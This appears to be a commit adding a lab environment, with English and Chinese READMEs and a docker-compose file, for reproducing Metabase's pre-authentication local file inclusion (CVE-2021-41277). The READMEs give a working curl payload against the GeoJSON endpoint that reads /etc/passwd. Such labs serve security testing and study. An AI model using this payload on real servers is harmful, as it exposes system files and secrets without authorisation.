first commit

metabase/CVE-2021-41277/README.md

@@ -0,0 +1,36 @@
+# Metabase Pre-Auth Local File Inclusion (CVE-2021-41277)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Metabase is an open source data analytics platform. In affected versions (x.40.0-x.40.4) a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support, unauthenticated attackers can use this vulnerability to read local file (including environment variables).
+
+References:
+
+- <https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr>
+- <https://github.com/tahtaciburak/CVE-2021-41277>
+
+## Environment Setup
+
+Execute following command to start a Metabase server 0.40.4:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can browse the `http://your-ip:3000` to see the installation instructions like that:
+
+![](1.png)
+
+Fill in your information, and skip the data source form.
+
+## Vulnerability Reproduce
+
+Simplely use the CURL to exploit this flaw:
+
+```
+curl -v http://your-ip:3000/api/geojson?url=file:////etc/passwd
+```
+
+As you can see, `/etc/passwd` has been exposed successfully.
+
+![](2.png)

metabase/CVE-2021-41277/README.zh-cn.md

@@ -0,0 +1,32 @@
+# Metabase任意文件读取漏洞（CVE-2021-41277）
+
+Metabase是一个开源的数据分析平台。在其0.40.0到0.40.4版本中，GeoJSON URL验证功能存在远程文件读取漏洞，未授权的攻击者可以利用这个漏洞读取服务器上的任意文件，包括环境变量等。
+
+参考链接：
+
+- <https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr>
+- <https://github.com/tahtaciburak/CVE-2021-41277>
+
+## 环境搭建
+
+执行如下命令启动一个Metabase 0.40.4版本服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:3000`可以查看到Metabase的安装引导页面，我们填写初始账号密码，并且跳过后续的数据库填写的步骤即可完成安装：
+
+![](1.png)
+
+## 漏洞复现
+
+只需要使用CURL即可简单地复现这个漏洞：
+
+```
+curl -v http://your-ip:3000/api/geojson?url=file:////etc/passwd
+```
+
+可见，`/etc/passwd`已经被成功读取：
+
+![](2.png)

metabase/CVE-2021-41277/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+  web:
+    image: vulhub/metabase:0.40.4
+    ports:
+      - "3000:3000"